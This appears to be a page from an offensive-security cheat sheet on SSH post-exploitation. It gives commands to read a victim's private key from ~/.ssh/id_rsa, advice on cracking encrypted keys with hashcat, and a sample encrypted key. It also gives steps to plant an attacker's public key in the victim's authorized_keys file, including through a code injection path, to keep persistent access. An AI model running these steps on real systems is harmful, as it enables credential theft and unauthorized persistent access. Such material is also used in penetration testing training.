SSH Private Key Grabbing and Planting

SSH Private Key Grabbing

An individual users private SSH key can be retrieved using

cat ~/.ssh/id_rsa

Sometimes the private key can be encrypted, this can typically be determined by looking at the proctype key header. If it's encrypted you will need to use hashcat or a similar tool in order to determine it's password.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,4F7C6A9FD8FB74EDF6E605487045F91D

qVxdFeBjyqXIUkZ6A+8u77HfZgUUwmPOuhN9xFYy+f36kKwr1Wol3iWRHB7W7Ien
5vjyyNT3+mTO272NcAwreWRH0EZWDmvltWP5e9gESTpA4ja+vNP32UNwJ9lK1PLL
mSm7XFl4xOMkhheRzJlLRF7b41C8PKsMVP2DpaHLMxHwTCY1fX5j/QgWpwPN5W0R
DTQvsHyFj+gfsYjCTdrHUX0Dhg+LdVr7SH9NDt0twg/RxtXkAvwbyw3eRXAR0YCB
mrldQ4ymh91G4CapoIOyGUVZUPE/Sz1ZExVCTlfGT9LUgE8L7aaImdOxFkrKDiVb
ddhdWnXwnCrkxIaktwCSIFzl8iT71OxsQOcoq+VV8VbOsL2ICdgHNOIxQ2HonRQS
Ej19P02Ea5rOHVVx/SYxT+ce6Zx301GkYmPu80LVVFK8x7gRajMYgFu/bgC67F91
/QQ6IYkpoSr+eY8l0aJa5IpUo20sGV6xktiyx4V5+kMudiNTE/SAAea/vCCBBqZl
5YFdp/TW5sqvkvB5w4/a/UUj1POa0tT/Ckox9JWq2idq+tYw+MATejY+Xv1HUOun
YuV0Lm5AjdSBAcpIfU6ztJQ1zoVVYPqWXwRia38pSFDTz1pAHt9W6JBCRT3PKLo9
rb8xOhvx6VNj4ZgvaEdxw25RCAGyoEN6/S7z/tgVYZvWoXRqUvOkYq2iyECQ+6ib
qn/YjpRCX0Q9/3QRH0XSfTo7GvzbS4nTC2KubxmG9CJv/AAfdf1DcpvSfjtkUn5a
bN1NOMWbJkrFCLeS6P4fPUJt8VwEJXP+IQaqz9bJYyRI1uIrG2PhzpRZ+24iHv63
2lY+lZpeZBdagYJcp3qnh/f6kVtD+AyhyDurQ+EhsgBdqm4XM+d7AvilTDzqiU3v
b6ZIzTRsVTWUKsTfvkiFop64d8uIov16b6FimiG/YNFQfd7SUL8hvjJVeArWRGjO
vPn+RB4BYS0s3VZI+08Jo/BL8EXFeuMZdpbDFnGDhaINSL1/cZasQS6hRYUJsKZN
T7ptM3NdKNyrVGwfKyttp3OHZFjPRjZezpBR60q+HI37pt/iDkuhbeK2Pr9jNR3f
jfqv8lGlOMIoPA6ERxPveUrLldL6NfLT0gPasDrWo0RRDIzanqz0wYK/SfuIiumT
8tonBa4kQlxAyenW1p+nx5bZ1QXPQaUbXbAe3AbOU2YG20LJ0v8mxVZE0zP9QNZM
DSHtv3uIl3nONJIJryp8Y6UjW1q3+UaAnTS6J/IXk+JVsSIRs5hbNDtNLlhFowDq
2OWEh2CRE7TNptk6Bb8pZbfyA/lCXJhJjo8YZLc3xZ2h1WF1vaXCHYo/FNqeoS0k
yicWCEz2fSKfNMnMpcVreQglfA9u49+Cvqzt1JnIlX1gDUg8EXV5rLAEgiSRfVin
B1pTjH/EROnppfQkteSbRq9B9rrvcEQ8Q5JPjr7kp3kk07spyiV6YqNmxVrvQtck
rQ+X68SNYRpsvCegy59Dbe5/d6jMdFxBzUZQKAHCyroTiUS8PtsAIuRechR0Cbza
OM2FRsIM8adUzfx7Q91Or+k2pIKNKqr+5sIpb4M0GHggd7gD10E+IBUjM9HsQR+o
-----END RSA PRIVATE KEY-----

SSH Private Key Planting

Generate a key for the user you're trying to log in as, best practice is to use a pass phrase.

ssh-keygen -f hal

Place the newly generated public key into the victims authorized keys file.

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4+NFeA9m1XeRbb2fPaDwId1Tg129S35lSsIRmfUs09YGoOgl8EvQQkmrQ5mIdceNzMxdb6mU/frR9njoXXhLcxD7RWKFauN65D58sJPt4SdU0zENra0WX7/038/4Gy4svwzVjGiupVPKydaLbWhxwoeLFz/39B/t4SXEJCyzgtOgvF5C8+ua/Cs9FdxU+IeaMHzZbUpwekuUICMMDu9Ao2l5/1iodIi6Bmbz1yXMbuC4trwkN7rkOUAKI+U9kamDmxUxvueJUpz8j56o10D7VIcrl3u27lYmejNxS5fxRCwQG/iRkZWi1XzY9FUhDpwhErVZzNbLijJr3MF+tiyR/6oA/DT9PbxjtSBxSMUrulacPP3a0RhoSGueNZMSyOTCH68e4yCgGQ3XP4hHTfXCGpH0aUfESaGUAbrQj1q1hx1gDJbUk1EGl+BllBDiL1vibo1VkzriTpuZ3e6RwzP/TW1Z7cEM7oxIdWP1mcqpCSIlXiFTsyZ6kmA4DIuD71RU=' >> ~/.ssh/authorized_keys
Planting SSH Keys through a code injection path.

Modify the newly generated private keys permissions

chmod 600 hal

and enjoy your stable ssh connection.

ssh -i hal [email protected]

Trouble Shooting Note: If the key doesn't work the first time inspect the authorized hosts file. There's a good chance that it appended to the last one making both it and yours unusable. Fix this by appending again and the new line should be there. Don't forget to fix the authorized key that you broke.

PreviousEnumerationNextAV Bypass

Last updated

Was this helpful?